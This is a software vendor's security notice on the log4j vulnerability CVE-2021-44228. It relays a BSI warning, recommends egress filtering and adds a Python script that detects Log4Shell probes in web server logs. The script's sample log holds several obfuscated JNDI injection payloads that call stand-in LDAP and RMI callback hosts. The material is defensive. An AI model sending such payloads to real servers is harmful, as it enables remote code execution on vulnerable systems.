2021-12-13

The German Federal Office for Information Security (BSI) has issued a warning entitled "Critical vulnerability in log4j published (CVE-2021-44228)".

[Warning (German)]

The logging library log4j is used in many Java applications. These include Java web applications exposed to the internet or intranet, for example those running on Apache Tomcat, which KISTERS software also uses. Because the vulnerability can be exploited remotely on a large scale across the internet, and exploitation attempts are evidently already under way, the BSI has raised its rating to "4 / Red: The IT threat situation is extremely critical".

We therefore recommend that our customers promptly review the security settings of their web servers and, in particular, implement the first measure recommended by the BSI:
Servers should generally only be allowed to establish connections (especially to the internet) that are strictly necessary for their purpose. All other connections should be prevented by suitable control points such as packet filters and application layer gateways. [BSI2021b]
This measure is effective because the exploit relies on the vulnerable server itself opening an outbound connection to an attacker-controlled LDAP or RMI server named in the injected lookup; if the server cannot reach arbitrary hosts, that step fails.
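The script below is an added example for this notice; it is not KISTERS code and not part of the BSI warning. It scans web server access log lines for the JNDI lookup strings that trigger CVE-2021-44228, folding the common obfuscations (nested `${lower:}`, `${upper:}` and `${...:-default}` lookups, percent-encoded request targets) so that `${jndi:...}` becomes visible, and lists the callback hosts and ports the server would have had to connect to. That list is exactly the set of outbound connections the egress filter described above denies. The log lines, IP addresses and host names are constructed for the example; the assumption that lookups other than `lower`/`upper` fail on the target and fall back to their default value mirrors what the obfuscated payloads rely on.

```python
"""Find Log4Shell (CVE-2021-44228) probes in web server access logs.

Added example, not KISTERS or BSI code. The sample log lines are constructed.
"""
import re
from typing import List, NamedTuple, Optional, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: no nested '${' or '}' inside the braces.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup in normalised form: ${jndi:<scheme>://<host>[:<port>]...
JNDI = re.compile(r"\$\{jndi:\s*([a-z]+)://([^/:}\s]+)(?::(\d+))?", re.IGNORECASE)
# Placeholder used to park lookups that must not be folded away.
SENTINEL = re.compile(r"\x01(\d+)\x02")


class Probe(NamedTuple):
    source_ip: str          # client address from the access log line
    scheme: str             # ldap, ldaps, rmi, dns, ...
    host: str               # callback host the vulnerable server would connect to
    port: Optional[int]     # None when the payload relies on the scheme default
    lookup: str             # the normalised lookup as matched


def _resolve(content: str) -> Optional[str]:
    """Resolve one innermost lookup the way an attacker expects log4j 2 to.

    Returns the substituted text, or None if the lookup must be kept as-is.
    Assumption (labelled): lookups other than lower/upper fail on the target
    host, so the text after ':-' (the default value) is what gets substituted.
    """
    head, sep, default = content.partition(":-")
    if not sep:
        default = None
    prefix, _, key = head.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "jndi":
        return None          # this is what we want to see; never fold it away
    return default           # ${::-j}, ${env:NOPE:-j} -> 'j'; no default -> None


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Fold nested/obfuscated ${...} lookups so ${jndi:...} becomes visible."""
    kept: List[str] = []

    def substitute(m) -> str:
        resolved = _resolve(m.group(1))
        if resolved is None:
            kept.append(m.group(0))            # park the unresolvable lookup ...
            return f"\x01{len(kept) - 1}\x02"  # ... behind a sentinel
        return resolved

    for _ in range(max_rounds):                # bounded: payloads can nest deeply
        folded = INNERMOST.sub(substitute, text)
        if folded == text:
            break
        text = folded
    while SENTINEL.search(text):               # parked lookups may themselves nest
        text = SENTINEL.sub(lambda m: kept[int(m.group(1))], text)
    return text


def find_probes(lines: List[str]) -> List[Probe]:
    """Scan access log lines (request line, referer, user agent) for JNDI lookups.

    The whole line is percent-decoded first, since servers log the raw request
    target and attackers frequently encode '${' as '%24%7B'.
    """
    probes = []
    for line in lines:
        source_ip = line.split(" ", 1)[0]
        for m in JNDI.finditer(normalize_lookups(unquote(line))):
            port = int(m.group(3)) if m.group(3) else None
            probes.append(Probe(source_ip, m.group(1).lower(), m.group(2), port, m.group(0)))
    return probes


def callback_targets(probes: List[Probe]) -> List[Tuple[str, Optional[int]]]:
    """Distinct (host, port) pairs the server would have had to reach for the
    exploit to work; these are the outbound connections an egress filter denies."""
    return sorted({(p.host, p.port) for p in probes}, key=lambda t: (t[0], t[1] or 0))


# Constructed sample log (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.10 - - [11/Dec/2021:03:14:22 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.11 - - [11/Dec/2021:03:15:01 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.8:1389/Exploit} HTTP/1.1" 404 196 "-" "curl/7.79.1"',
    '203.0.113.12 - - [11/Dec/2021:03:16:40 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.9:1099/x}"',
    '198.51.100.20 - - [11/Dec/2021:03:17:05 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.13 - - [11/Dec/2021:03:18:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}ndi:ldap://cb.example.net/a}"',
    '203.0.113.14 - - [11/Dec/2021:03:19:48 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404 196 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG)
    for p in hits:
        print(f"{p.source_ip:15} {p.scheme:5} {p.host}:{p.port}  {p.lookup}")
    print("callback targets:", callback_targets(hits))
```

A match only shows that an attempt was logged, not that it succeeded; whether the server actually connected to one of the listed targets is answered by the packet filter or proxy logs, which is another reason the egress restriction should be in place before such probes arrive. The normaliser covers the obfuscations most commonly seen in the wild, not every log4j lookup type, so treat it as a first triage step rather than a complete detector.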

We have implemented this measure for our customers who use the KISTERScloud.

Our development teams are currently investigating which of our software products are specifically affected and which additional measures can be taken to reduce the risk of the vulnerability being exploited.